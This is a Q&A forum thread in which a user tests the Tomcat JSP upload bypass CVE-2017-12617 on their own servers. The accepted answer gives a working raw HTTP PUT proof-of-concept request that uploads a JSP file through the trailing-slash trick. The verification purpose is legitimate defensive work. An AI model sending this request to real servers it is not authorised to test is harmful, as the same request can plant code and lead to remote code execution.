# Working Exploit for tomcat vulnerability : JSP Upload Bypass CVE-2017-12617

Tags: security, tomcat, exploit

https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb@%3Cannounce.tomcat.apache.org%3E

I have a tomcat 6.x, 7.x and 8.x and Jboss 7.2.x AS server running on windows. I created a web application under the webapps directory. I modified $TOMCAT_HOME/conf/web.xml and set the readonly parameter to false(by default, it is true). Then, I ran the exploit https://www.exploit-db.com/exploits/42966/ -- which is a python script that tries to upload a payload using HTTP PUT. 
I ran the following command line : 
python 42966.py -u http://localhost:9292/ExploitTest

I am getting a 
1) Http 404 status(resource not found) from tomcat 8.0.x, 
2) Http  400 status(bad request) from tomcat 6.x and 
3) Http 400 status from tomcat 7.x.

I was expecting that running the above python exploit would result in HTTP 201 (newly created resource) in the tomcat server. What's wrong with the exploit ? OR did I not setup tomcat correctly for the vulnerability ? Is there a curl or java based or any other working exploit for this vulnerability that I can use to verify that my server is indeed vulnerable or not ?

Answer (score 1, accepted):

Found the answer on https://www.peew.pw/blog/2017/10/9/new-vulnerability-same-old-tomcat-cve-2017-12615. Originally, the request is at https://bz.apache.org/bugzilla/show_bug.cgi?id=61542.

I used Burp Suite to craft the POC request per above link

```
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26

<% out.println("hello");%>
```

This does the trick!